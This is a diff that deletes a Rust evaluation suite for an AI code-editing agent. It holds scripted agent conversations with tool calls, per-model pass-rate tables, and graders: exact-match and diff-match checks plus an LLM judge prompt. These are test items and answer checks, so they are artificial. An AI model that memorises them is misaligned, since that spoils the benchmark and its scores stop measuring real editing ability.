- - Use these clang flags: -fPIC -shared -Os -Wl,--export=tree_sitter_{{language_name}} - - Here are the available wasi-sdk assets: - - wasi-sdk-25.0-x86_64-macos.tar.gz - - wasi-sdk-25.0-arm64-macos.tar.gz - - wasi-sdk-25.0-x86_64-linux.tar.gz - - wasi-sdk-25.0-arm64-linux.tar.gz - - wasi-sdk-25.0-x86_64-linux.tar.gz - - wasi-sdk-25.0-arm64-linux.tar.gz - - wasi-sdk-25.0-x86_64-windows.tar.gz - "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(971), - end_line: Some(1050), - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - lines(input_file_content, 971..1050), - )], - ), - message( - Assistant, - [tool_use( - "tool_2", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(1050), - end_line: Some(1100), - }, - )], - ), - message( - User, - [tool_result( - "tool_2", - ReadFileTool::NAME, - lines(input_file_content, 1050..1100), - )], - ), - message( - Assistant, - [tool_use( - "tool_3", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(1100), - end_line: Some(1150), - }, - )], - ), - message( - User, - [tool_result( - "tool_3", - ReadFileTool::NAME, - lines(input_file_content, 1100..1150), - )], - ), - message( - Assistant, - [tool_use( - "tool_4", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::judge_diff(indoc! 
{" - - The compile_parser_to_wasm method has been changed to use wasi-sdk - - ureq is used to download the SDK for current platform and architecture - "}), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_disable_cursor_blinking() { - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 0.59 (2025-07-14) - // claude-sonnet-4 | 0.81 (2025-07-14) - // gemini-2.5-pro | 0.95 (2025-07-14) - // gemini-2.5-flash-preview-04-17 | 0.78 (2025-07-14) - - let input_file_path = "root/editor.rs"; - let input_file_content = include_str!("evals/fixtures/disable_cursor_blinking/before.rs"); - let edit_description = "Comment out the call to `BlinkManager::enable`"; - let possible_diffs = vec![ - include_str!("evals/fixtures/disable_cursor_blinking/possible-01.diff"), - include_str!("evals/fixtures/disable_cursor_blinking/possible-02.diff"), - include_str!("evals/fixtures/disable_cursor_blinking/possible-03.diff"), - include_str!("evals/fixtures/disable_cursor_blinking/possible-04.diff"), - ]; - eval_utils::eval(100, 0.51, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message(User, [text("Let's research how to cursor blinking works.")]), - message( - Assistant, - [tool_use( - "tool_1", - GrepTool::NAME, - GrepToolInput { - regex: "blink".into(), - include_pattern: None, - offset: 0, - case_sensitive: false, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - GrepTool::NAME, - [ - lines(input_file_content, 100..400), - lines(input_file_content, 800..1300), - lines(input_file_content, 1600..2000), - lines(input_file_content, 5000..5500), - lines(input_file_content, 8000..9000), - lines(input_file_content, 18455..18470), - lines(input_file_content, 20000..20500), - lines(input_file_content, 21000..21300), - ] - .join("Match found:\n\n"), - )], - ), - message( - User, - [text(indoc! {" - Comment out the lines that interact with the BlinkManager. 
- Keep the outer `update` blocks, but comments everything that's inside (including if statements). - Don't add additional comments. - "})], - ), - message( - Assistant, - [tool_use( - "tool_4", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::assert_diff_any(possible_diffs.clone()), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_from_pixels_constructor() { - // Results for 2025-06-13 - // - // The outcome of this evaluation depends heavily on the LINE_HINT_TOLERANCE - // value. Higher values improve the pass rate but may sometimes cause - // edits to be misapplied. In the context of this eval, this means - // the agent might add from_pixels tests in incorrect locations - // (e.g., at the beginning of the file), yet the evaluation may still - // rate it highly. - // - // Model | Date | Pass rate - // ========================================================= - // claude-4.0-sonnet | 2025-06-14 | 0.99 - // claude-3.7-sonnet | 2025-06-14 | 0.88 - // gemini-2.5-pro-preview-06-05 | 2025-06-16 | 0.98 - - let input_file_path = "root/canvas.rs"; - let input_file_content = include_str!("evals/fixtures/from_pixels_constructor/before.rs"); - let edit_description = "Implement from_pixels constructor and add tests."; - - eval_utils::eval(100, 0.95, mismatched_tag_threshold(0.25), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(indoc! {" - Introduce a new `from_pixels` constructor in Canvas and - also add tests for it in the same file. 
- "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: None, - end_line: None, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - input_file_content, - )], - ), - message( - Assistant, - [tool_use( - "tool_2", - GrepTool::NAME, - GrepToolInput { - regex: "mod\\s+tests".into(), - include_pattern: Some("font-kit/src/canvas.rs".into()), - offset: 0, - case_sensitive: false, - }, - )], - ), - message( - User, - [tool_result("tool_2", GrepTool::NAME, "No matches found")], - ), - message( - Assistant, - [tool_use( - "tool_3", - GrepTool::NAME, - GrepToolInput { - regex: "mod\\s+tests".into(), - include_pattern: Some("font-kit/src/**/*.rs".into()), - offset: 0, - case_sensitive: false, - }, - )], - ), - message( - User, - [tool_result("tool_3", GrepTool::NAME, "No matches found")], - ), - message( - Assistant, - [tool_use( - "tool_4", - GrepTool::NAME, - GrepToolInput { - regex: "#\\[test\\]".into(), - include_pattern: Some("font-kit/src/**/*.rs".into()), - offset: 0, - case_sensitive: false, - }, - )], - ), - message( - User, - [tool_result( - "tool_4", - GrepTool::NAME, - indoc! {" - Found 6 matches: - - ## Matches in font-kit/src/loaders/core_text.rs - - ### mod test › L926-936 - ``` - mod test { - use super::Font; - use crate::properties::{Stretch, Weight}; - - #[cfg(feature = \"source\")] - use crate::source::SystemSource; - - static TEST_FONT_POSTSCRIPT_NAME: &'static str = \"ArialMT\"; - - #[cfg(feature = \"source\")] - #[test] - ``` - - 55 lines remaining in ancestor node. Read the file to see all. 
- - ### mod test › L947-951 - ``` - } - - #[test] - fn test_core_text_to_css_font_weight() { - // Exact matches - ``` - - ### mod test › L959-963 - ``` - } - - #[test] - fn test_core_text_to_css_font_stretch() { - // Exact matches - ``` - - ## Matches in font-kit/src/loaders/freetype.rs - - ### mod test › L1238-1248 - ``` - mod test { - use crate::loaders::freetype::Font; - - static PCF_FONT_PATH: &str = \"resources/tests/times-roman-pcf/timR12.pcf\"; - static PCF_FONT_POSTSCRIPT_NAME: &str = \"Times-Roman\"; - - #[test] - fn get_pcf_postscript_name() { - let font = Font::from_path(PCF_FONT_PATH, 0).unwrap(); - assert_eq!(font.postscript_name().unwrap(), PCF_FONT_POSTSCRIPT_NAME); - } - ``` - - 1 lines remaining in ancestor node. Read the file to see all. - - ## Matches in font-kit/src/sources/core_text.rs - - ### mod test › L265-275 - ``` - mod test { - use crate::properties::{Stretch, Weight}; - - #[test] - fn test_css_to_core_text_font_weight() { - // Exact matches - assert_eq!(super::css_to_core_text_font_weight(Weight(100.0)), -0.7); - assert_eq!(super::css_to_core_text_font_weight(Weight(400.0)), 0.0); - assert_eq!(super::css_to_core_text_font_weight(Weight(700.0)), 0.4); - assert_eq!(super::css_to_core_text_font_weight(Weight(900.0)), 0.8); - - ``` - - 27 lines remaining in ancestor node. Read the file to see all. - - ### mod test › L278-282 - ``` - } - - #[test] - fn test_css_to_core_text_font_stretch() { - // Exact matches - ``` - "}, - )], - ), - message( - Assistant, - [tool_use( - "tool_5", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - )], - ), - ], - Some(input_file_content.into()), - EvalAssertion::judge_diff(indoc! 
{" - - The diff contains a new `from_pixels` constructor - - The diff contains new tests for the `from_pixels` constructor - "}), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_zode() { - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 1.0 (2025-06-14) - // claude-sonnet-4 | 1.0 (2025-06-14) - // gemini-2.5-pro-preview-03-25 | 1.0 (2025-05-22) - // gemini-2.5-flash-preview-04-17 | 1.0 (2025-05-22) - - let input_file_path = "root/zode.py"; - let input_content = None; - let edit_description = "Create the main Zode CLI script"; - - eval_utils::eval(50, 1., mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message(User, [text(include_str!("evals/fixtures/zode/prompt.md"))]), - message( - Assistant, - [ - tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: "root/eval/react.py".into(), - start_line: None, - end_line: None, - }, - ), - tool_use( - "tool_2", - ReadFileTool::NAME, - ReadFileToolInput { - path: "root/eval/react_test.py".into(), - start_line: None, - end_line: None, - }, - ), - ], - ), - message( - User, - [ - tool_result( - "tool_1", - ReadFileTool::NAME, - include_str!("evals/fixtures/zode/react.py"), - ), - tool_result( - "tool_2", - ReadFileTool::NAME, - include_str!("evals/fixtures/zode/react_test.py"), - ), - ], - ), - message( - Assistant, - [ - text( - "Now that I understand what we need to build, I'll create the main Python script:", - ), - tool_use( - "tool_3", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Create, - }, - ), - ], - ), - ], - input_content.clone(), - EvalAssertion::new(async move |sample, _, _cx| { - let invalid_starts = [' ', '`', '\n']; - let mut message = String::new(); - for start in invalid_starts { - if sample.text_after.starts_with(start) { - message.push_str(&format!("The 
sample starts with a {:?}\n", start)); - break; - } - } - // Remove trailing newline. - message.pop(); - - if message.is_empty() { - Ok(EvalAssertionOutcome { - score: 100, - message: None, - }) - } else { - Ok(EvalAssertionOutcome { - score: 0, - message: Some(message), - }) - } - }), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_add_overwrite_test() { - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 0.65 (2025-06-14) - // claude-sonnet-4 | 0.07 (2025-06-14) - // gemini-2.5-pro-preview-03-25 | 0.35 (2025-05-22) - // gemini-2.5-flash-preview-04-17 | - - let input_file_path = "root/action_log.rs"; - let input_file_content = include_str!("evals/fixtures/add_overwrite_test/before.rs"); - let edit_description = "Add a new test for overwriting a file in action_log.rs"; - - eval_utils::eval(200, 0.5, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message( - User, - [text(indoc! {" - Introduce a new test in `action_log.rs` to test overwriting a file. - That is, a file already exists, but we call `buffer_created` as if the file were new. - Take inspiration from all the other tests in the file. - "})], - ), - message( - Assistant, - [tool_use( - "tool_1", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: None, - end_line: None, - }, - )], - ), - message( - User, - [tool_result( - "tool_1", - ReadFileTool::NAME, - indoc! 
{" - pub struct ActionLog [L13-20] - tracked_buffers [L15] - edited_since_project_diagnostics_check [L17] - project [L19] - impl ActionLog [L22-498] - pub fn new [L24-30] - pub fn project [L32-34] - pub fn checked_project_diagnostics [L37-39] - pub fn has_edited_files_since_project_diagnostics_check [L42-44] - fn track_buffer_internal [L46-101] - fn handle_buffer_event [L103-116] - fn handle_buffer_edited [L118-123] - fn handle_buffer_file_changed [L125-158] - async fn maintain_diff [L160-264] - pub fn buffer_read [L267-269] - pub fn buffer_created [L272-276] - pub fn buffer_edited [L279-287] - pub fn will_delete_buffer [L289-304] - pub fn keep_edits_in_range [L306-364] - pub fn reject_edits_in_ranges [L366-459] - pub fn keep_all_edits [L461-473] - pub fn changed_buffers [L476-482] - pub fn stale_buffers [L485-497] - fn apply_non_conflicting_edits [L500-561] - fn diff_snapshots [L563-585] - fn point_to_row_edit [L587-614] - enum ChangeAuthor [L617-620] - User [L618] - Agent [L619] - enum TrackedBufferStatus [L623-627] - Created [L624] - Modified [L625] - Deleted [L626] - struct TrackedBuffer [L629-641] - buffer [L630] - base_text [L631] - unreviewed_changes [L632] - status [L633] - version [L634] - diff [L635] - snapshot [L636] - diff_update [L637] - _open_lsp_handle [L638] - _maintain_diff [L639] - _subscription [L640] - impl TrackedBuffer [L643-657] - fn has_changes [L644-650] - fn schedule_diff_update [L652-656] - pub struct ChangedBuffer [L659-661] - pub diff [L660] - mod tests [L664-1574] - fn init_logger [L678-682] - fn init_test [L684-691] - async fn test_keep_edits [L694-769] - async fn test_deletions [L772-854] - async fn test_overlapping_user_edits [L857-951] - async fn test_creating_files [L954-1010] - async fn test_deleting_files [L1013-1120] - async fn test_reject_edits [L1123-1255] - async fn test_reject_multiple_edits [L1258-1331] - async fn test_reject_deleted_file [L1334-1388] - async fn test_reject_created_file [L1391-1443] - async fn 
test_random_diffs [L1446-1535] - fn quiesce [L1510-1534] - struct HunkStatus [L1538-1542] - range [L1539] - diff_status [L1540] - old_text [L1541] - fn unreviewed_hunks [L1544-1573] - - Showing symbols 1-69 (total symbols: 69) - - Using the line numbers in this outline, you can call this tool again while specifying - the start_line and end_line fields to see the implementations of symbols in the outline. - "}, - )], - ), - message( - Assistant, - [ - text( - "Let's look at the existing test cases that are related to file creation to understand the pattern:", - ), - tool_use( - "tool_2", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(953), - end_line: Some(1010), - }, - ), - ], - ), - message( - User, - [tool_result( - "tool_2", - ReadFileTool::NAME, - lines(input_file_content, 953..1010), - )], - ), - message( - Assistant, - [ - text( - "Now let's look at another relevant test to understand how they're structured:", - ), - tool_use( - "tool_3", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(1012), - end_line: Some(1120), - }, - ), - ], - ), - message( - User, - [tool_result( - "tool_3", - ReadFileTool::NAME, - lines(input_file_content, 1012..1120), - )], - ), - message( - Assistant, - [ - text("Now let's look at how `buffer_created` is implemented:"), - tool_use( - "tool_4", - ReadFileTool::NAME, - ReadFileToolInput { - path: input_file_path.into(), - start_line: Some(271), - end_line: Some(276), - }, - ), - ], - ), - message( - User, - [tool_result( - "tool_4", - ReadFileTool::NAME, - lines(input_file_content, 271..276), - )], - ), - message( - Assistant, - [ - text(indoc! {" - Based on my understanding of the existing tests and code, I'll now create a new test for overwriting a file. In this test, we'll: - - 1. Create a file - 2. Open a buffer for it - 3. Track it in the action log - 4. Modify the buffer - 5. Call `buffer_created` again as if the file were new - 6. 
Check that the changes are properly tracked - - Let's write the test: - "}), - tool_use( - "tool_5", - EditFileTool::NAME, - EditFileToolInput { - display_description: edit_description.into(), - path: input_file_path.into(), - mode: EditFileMode::Edit, - }, - ), - ], - ), - ], - Some(input_file_content.into()), - EvalAssertion::judge_diff( - "A new test for overwritten files was created, without changing any previous test", - ), - )) - }); -} - -#[test] -#[cfg_attr(not(feature = "unit-eval"), ignore)] -fn eval_create_empty_file() { - // Check that Edit Agent can create a file without writing its - // thoughts into it. This issue is not specific to empty files, but - // it's easier to reproduce with them. - // - // Model | Pass rate - // ============================================ - // - // claude-3.7-sonnet | 1.00 (2025-06-14) - // claude-sonnet-4 | 1.00 (2025-06-14) - // gemini-2.5-pro-preview-03-25 | 1.00 (2025-05-21) - // gemini-2.5-flash-preview-04-17 | 1.00 (2025-05-21) - - let input_file_content = None; - let expected_output_content = String::new(); - - eval_utils::eval(100, 0.99, mismatched_tag_threshold(0.05), move || { - run_eval(EvalInput::from_conversation( - vec![ - message(User, [text("Create a second empty todo file ")]), - message( - Assistant, - [ - text(formatdoc! {" - I'll help you create a second empty todo file. - First, let me examine the project structure to see if there's already a todo file, which will help me determine the appropriate name and location for the second one. - "}), - tool_use( - "toolu_01GAF8TtsgpjKxCr8fgQLDgR", - ListDirectoryTool::NAME, - ListDirectoryToolInput { - path: "root".to_string(), - }, - ), - ], - ), - message( - User, - [tool_result( - "toolu_01GAF8TtsgpjKxCr8fgQLDgR", - ListDirectoryTool::NAME, - "root/TODO\nroot/TODO2\nroot/new.txt\n", - )], - ), - message( - Assistant, - [ - text(formatdoc! {" - I can see there's already a `TODO` file in the `root` directory. 
Let me create a second empty todo file called `TODO3` in the same directory: - "}), - tool_use( - "toolu_01Tb3iQ9griqSYMmVuykQPWU", - EditFileTool::NAME, - EditFileToolInput { - display_description: "Create empty TODO3 file".to_string(), - mode: EditFileMode::Create, - path: "root/TODO3".into(), - }, - ), - ], - ), - ], - input_file_content.clone(), - // Bad behavior is to write something like - // "I'll create an empty TODO3 file as requested." - EvalAssertion::assert_eq(expected_output_content.clone()), - )) - }); -} - -fn message( - role: Role, - contents: impl IntoIterator, -) -> LanguageModelRequestMessage { - LanguageModelRequestMessage { - role, - content: contents.into_iter().collect(), - cache: false, - reasoning_details: None, - } -} - -fn text(text: impl Into) -> MessageContent { - MessageContent::Text(text.into()) -} - -fn lines(input: &str, range: Range) -> String { - input - .lines() - .skip(range.start) - .take(range.len()) - .collect::>() - .join("\n") -} - -fn tool_use( - id: impl Into>, - name: impl Into>, - input: impl Serialize, -) -> MessageContent { - MessageContent::ToolUse(LanguageModelToolUse { - id: LanguageModelToolUseId::from(id.into()), - name: name.into(), - raw_input: serde_json::to_string_pretty(&input).unwrap(), - input: serde_json::to_value(input).unwrap(), - is_input_complete: true, - thought_signature: None, - }) -} - -fn tool_result( - id: impl Into>, - name: impl Into>, - result: impl Into>, -) -> MessageContent { - MessageContent::ToolResult(LanguageModelToolResult { - tool_use_id: LanguageModelToolUseId::from(id.into()), - tool_name: name.into(), - is_error: false, - content: vec![LanguageModelToolResultContent::Text(result.into())], - output: None, - }) -} - -#[derive(Clone)] -struct EvalInput { - conversation: Vec, - edit_file_input: EditFileToolInput, - input_content: Option, - assertion: EvalAssertion, -} - -impl EvalInput { - fn from_conversation( - conversation: Vec, - input_content: Option, - assertion: EvalAssertion, 
- ) -> Self { - let msg = conversation.last().expect("Conversation must not be empty"); - if msg.role != Role::Assistant { - panic!("Conversation must end with an assistant message"); - } - let tool_use = msg - .content - .iter() - .flat_map(|content| match content { - MessageContent::ToolUse(tool_use) if tool_use.name == EditFileTool::NAME.into() => { - Some(tool_use) - } - _ => None, - }) - .next() - .expect("Conversation must end with an edit_file tool use") - .clone(); - - let edit_file_input: EditFileToolInput = serde_json::from_value(tool_use.input).unwrap(); - - EvalInput { - conversation, - edit_file_input, - input_content, - assertion, - } - } -} - -#[derive(Clone)] -struct EvalSample { - text_before: String, - text_after: String, - edit_output: EditAgentOutput, - diff: String, -} - -trait AssertionFn: 'static + Send + Sync { - fn assert<'a>( - &'a self, - sample: &'a EvalSample, - judge_model: Arc, - cx: &'a mut TestAppContext, - ) -> LocalBoxFuture<'a, Result>; -} - -impl AssertionFn for F -where - F: 'static - + Send - + Sync - + AsyncFn( - &EvalSample, - Arc, - &mut TestAppContext, - ) -> Result, -{ - fn assert<'a>( - &'a self, - sample: &'a EvalSample, - judge_model: Arc, - cx: &'a mut TestAppContext, - ) -> LocalBoxFuture<'a, Result> { - (self)(sample, judge_model, cx).boxed_local() - } -} - -#[derive(Clone)] -struct EvalAssertion(Arc); - -impl EvalAssertion { - fn new(f: F) -> Self - where - F: 'static - + Send - + Sync - + AsyncFn( - &EvalSample, - Arc, - &mut TestAppContext, - ) -> Result, - { - EvalAssertion(Arc::new(f)) - } - - fn assert_eq(expected: impl Into) -> Self { - let expected = expected.into(); - Self::new(async move |sample, _judge, _cx| { - Ok(EvalAssertionOutcome { - score: if strip_empty_lines(&sample.text_after) == strip_empty_lines(&expected) { - 100 - } else { - 0 - }, - message: None, - }) - }) - } - - fn assert_diff_any(expected_diffs: Vec>) -> Self { - let expected_diffs: Vec = 
expected_diffs.into_iter().map(Into::into).collect(); - Self::new(async move |sample, _judge, _cx| { - let matches = expected_diffs.iter().any(|possible_diff| { - let expected = - language::apply_diff_patch(&sample.text_before, possible_diff).unwrap(); - strip_empty_lines(&expected) == strip_empty_lines(&sample.text_after) - }); - - Ok(EvalAssertionOutcome { - score: if matches { 100 } else { 0 }, - message: None, - }) - }) - } - - fn judge_diff(assertions: &'static str) -> Self { - Self::new(async move |sample, judge, cx| { - let prompt = DiffJudgeTemplate { - diff: sample.diff.clone(), - assertions, - } - .render(&Templates::new()) - .unwrap(); - - let request = LanguageModelRequest { - messages: vec![LanguageModelRequestMessage { - role: Role::User, - content: vec![prompt.into()], - cache: false, - reasoning_details: None, - }], - thinking_allowed: true, - ..Default::default() - }; - let mut response = retry_on_rate_limit(async || { - Ok(judge - .stream_completion_text(request.clone(), &cx.to_async()) - .await?) - }) - .await?; - let mut output = String::new(); - while let Some(chunk) = response.stream.next().await { - let chunk = chunk?; - output.push_str(&chunk); - } - - // Parse the score from the response - let re = regex::Regex::new(r"(\d+)").unwrap(); - if let Some(captures) = re.captures(&output) - && let Some(score_match) = captures.get(1) - { - let score = score_match.as_str().parse().unwrap_or(0); - return Ok(EvalAssertionOutcome { - score, - message: Some(output), - }); - } - - anyhow::bail!("No score found in response. 
Raw output: {output}"); - }) - } - - async fn run( - &self, - input: &EvalSample, - judge_model: Arc, - cx: &mut TestAppContext, - ) -> Result { - self.0.assert(input, judge_model, cx).await - } -} - -fn run_eval(eval: EvalInput) -> eval_utils::EvalOutput { - let dispatcher = gpui::TestDispatcher::new(rand::random()); - let mut cx = TestAppContext::build(dispatcher, None); - let foreground_executor = cx.foreground_executor().clone(); - let result = foreground_executor.block_test(async { - let test = EditAgentTest::new(&mut cx).await; - test.eval(eval, &mut cx).await - }); - cx.quit(); - match result { - Ok(output) => eval_utils::EvalOutput { - data: output.to_string(), - outcome: if output.assertion.score < 80 { - eval_utils::OutcomeKind::Failed - } else { - eval_utils::OutcomeKind::Passed - }, - metadata: EditEvalMetadata { - tags: output.sample.edit_output.parser_metrics.tags, - mismatched_tags: output.sample.edit_output.parser_metrics.mismatched_tags, - }, - }, - Err(e) => eval_utils::EvalOutput { - data: format!("{e:?}"), - outcome: eval_utils::OutcomeKind::Error, - metadata: EditEvalMetadata { - tags: 0, - mismatched_tags: 0, - }, - }, - } -} - -#[derive(Clone)] -struct EditEvalOutput { - sample: EvalSample, - assertion: EvalAssertionOutcome, -} - -impl Display for EditEvalOutput { - fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { - writeln!(f, "Score: {:?}", self.assertion.score)?; - if let Some(message) = self.assertion.message.as_ref() { - writeln!(f, "Message: {}", message)?; - } - - writeln!(f, "Diff:\n{}", self.sample.diff)?; - - writeln!( - f, - "Parser Metrics:\n{:#?}", - self.sample.edit_output.parser_metrics - )?; - writeln!(f, "Raw Edits:\n{}", self.sample.edit_output.raw_edits)?; - Ok(()) - } -} - -struct EditAgentTest { - agent: EditAgent, - project: Entity, - judge_model: Arc, -} - -impl EditAgentTest { - async fn new(cx: &mut TestAppContext) -> Self { - cx.executor().allow_parking(); - - let fs = FakeFs::new(cx.executor()); - 
cx.update(|cx| { - settings::init(cx); - gpui_tokio::init(cx); - let http_client = Arc::new(ReqwestClient::user_agent("agent tests").unwrap()); - cx.set_http_client(http_client); - let client = Client::production(cx); - let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); - settings::init(cx); - language_model::init(cx); - RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); - language_models::init(user_store, client.clone(), cx); - }); - - fs.insert_tree("/root", json!({})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let agent_model = SelectedModel::from_str( - &std::env::var("ZED_AGENT_MODEL").unwrap_or("anthropic/claude-sonnet-4-latest".into()), - ) - .unwrap(); - let judge_model = SelectedModel::from_str( - &std::env::var("ZED_JUDGE_MODEL").unwrap_or("anthropic/claude-sonnet-4-latest".into()), - ) - .unwrap(); - - let authenticate_provider_tasks = cx.update(|cx| { - LanguageModelRegistry::global(cx).update(cx, |registry, cx| { - registry - .providers() - .iter() - .map(|p| p.authenticate(cx)) - .collect::>() - }) - }); - let (agent_model, judge_model) = cx - .update(|cx| { - cx.spawn(async move |cx| { - futures::future::join_all(authenticate_provider_tasks).await; - let agent_model = Self::load_model(&agent_model, cx).await; - let judge_model = Self::load_model(&judge_model, cx).await; - (agent_model.unwrap(), judge_model.unwrap()) - }) - }) - .await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - - let edit_format = EditFormat::from_env(agent_model.clone()).unwrap(); - - Self { - agent: EditAgent::new( - agent_model, - project.clone(), - action_log, - Templates::new(), - edit_format, - true, - true, - ), - project, - judge_model, - } - } - - async fn load_model( - selected_model: &SelectedModel, - cx: &mut AsyncApp, - ) -> Result> { - cx.update(|cx| { - let registry = LanguageModelRegistry::read_global(cx); - let provider = registry - 
.provider(&selected_model.provider) - .expect("Provider not found"); - provider.authenticate(cx) - }) - .await?; - Ok(cx.update(|cx| { - let models = LanguageModelRegistry::read_global(cx); - let model = models - .available_models(cx) - .find(|model| { - model.provider_id() == selected_model.provider - && model.id() == selected_model.model - }) - .unwrap_or_else(|| panic!("Model {} not found", selected_model.model.0)); - model - })) - } - - async fn eval(&self, mut eval: EvalInput, cx: &mut TestAppContext) -> Result { - // Make sure the last message in the conversation is cached. - eval.conversation.last_mut().unwrap().cache = true; - - let path = self - .project - .read_with(cx, |project, cx| { - project.find_project_path(eval.edit_file_input.path, cx) - }) - .unwrap(); - let buffer = self - .project - .update(cx, |project, cx| project.open_buffer(path, cx)) - .await - .unwrap(); - - let tools = crate::built_in_tools().collect::>(); - - let system_prompt = { - let worktrees = vec![WorktreeContext { - root_name: "root".to_string(), - abs_path: Path::new("/path/to/root").into(), - rules_file: None, - }]; - let project_context = ProjectContext::new(worktrees, Vec::default()); - let tool_names = tools - .iter() - .map(|tool| tool.name.clone().into()) - .collect::>(); - let template = crate::SystemPromptTemplate { - project: &project_context, - available_tools: tool_names, - model_name: None, - }; - let templates = Templates::new(); - template.render(&templates).unwrap() - }; - - let has_system_prompt = eval - .conversation - .first() - .is_some_and(|msg| msg.role == Role::System); - let messages = if has_system_prompt { - eval.conversation - } else { - [LanguageModelRequestMessage { - role: Role::System, - content: vec![MessageContent::Text(system_prompt)], - cache: true, - reasoning_details: None, - }] - .into_iter() - .chain(eval.conversation) - .collect::>() - }; - - let conversation = LanguageModelRequest { - messages, - tools, - thinking_allowed: true, - 
..Default::default() - }; - - let edit_output = if matches!(eval.edit_file_input.mode, EditFileMode::Edit) { - if let Some(input_content) = eval.input_content.as_deref() { - buffer.update(cx, |buffer, cx| buffer.set_text(input_content, cx)); - } - retry_on_rate_limit(async || { - self.agent - .edit( - buffer.clone(), - eval.edit_file_input.display_description.clone(), - &conversation, - &mut cx.to_async(), - ) - .0 - .await - }) - .await? - } else { - retry_on_rate_limit(async || { - self.agent - .overwrite( - buffer.clone(), - eval.edit_file_input.display_description.clone(), - &conversation, - &mut cx.to_async(), - ) - .0 - .await - }) - .await? - }; - - let buffer_text = buffer.read_with(cx, |buffer, _| buffer.text()); - let sample = EvalSample { - edit_output, - diff: language::unified_diff( - eval.input_content.as_deref().unwrap_or_default(), - &buffer_text, - ), - text_before: eval.input_content.unwrap_or_default(), - text_after: buffer_text, - }; - let assertion = eval - .assertion - .run(&sample, self.judge_model.clone(), cx) - .await?; - - Ok(EditEvalOutput { assertion, sample }) - } -} - -async fn retry_on_rate_limit(mut request: impl AsyncFnMut() -> Result) -> Result { - const MAX_RETRIES: usize = 20; - let mut attempt = 0; - - loop { - attempt += 1; - let response = request().await; - - if attempt >= MAX_RETRIES { - return response; - } - - let retry_delay = match &response { - Ok(_) => None, - Err(err) => match err.downcast_ref::() { - Some(err) => match &err { - LanguageModelCompletionError::RateLimitExceeded { retry_after, .. } - | LanguageModelCompletionError::ServerOverloaded { retry_after, .. } => { - Some(retry_after.unwrap_or(Duration::from_secs(5))) - } - LanguageModelCompletionError::UpstreamProviderError { - status, - retry_after, - .. 
- } => { - // Only retry for specific status codes - let should_retry = matches!( - *status, - StatusCode::TOO_MANY_REQUESTS | StatusCode::SERVICE_UNAVAILABLE - ) || status.as_u16() == 529; - - if should_retry { - // Use server-provided retry_after if available, otherwise use default - Some(retry_after.unwrap_or(Duration::from_secs(5))) - } else { - None - } - } - LanguageModelCompletionError::ApiReadResponseError { .. } - | LanguageModelCompletionError::ApiInternalServerError { .. } - | LanguageModelCompletionError::HttpSend { .. } => { - // Exponential backoff for transient I/O and internal server errors - Some(Duration::from_secs(2_u64.pow((attempt - 1) as u32).min(30))) - } - _ => None, - }, - _ => None, - }, - }; - - if let Some(retry_after) = retry_delay { - let jitter = retry_after.mul_f64(rand::rng().random_range(0.0..1.0)); - eprintln!("Attempt #{attempt}: Retry after {retry_after:?} + jitter of {jitter:?}"); - // This code does not use the gpui::executor - #[allow(clippy::disallowed_methods)] - async_io::Timer::after(retry_after + jitter).await; - } else { - return response; - } - } -} - -#[derive(Clone, Debug, Eq, PartialEq, Hash)] -struct EvalAssertionOutcome { - score: usize, - message: Option, -} - -#[derive(Serialize)] -pub struct DiffJudgeTemplate { - diff: String, - assertions: &'static str, -} - -impl Template for DiffJudgeTemplate { - const TEMPLATE_NAME: &'static str = "diff_judge.hbs"; -} - -fn strip_empty_lines(text: &str) -> String { - text.lines() - .filter(|line| !line.trim().is_empty()) - .collect::>() - .join("\n") -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/add_overwrite_test/before.rs b/crates/agent/src/edit_agent/evals/fixtures/add_overwrite_test/before.rs deleted file mode 100644 index 0d2a0be1fb889a..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/add_overwrite_test/before.rs +++ /dev/null @@ -1,1572 +0,0 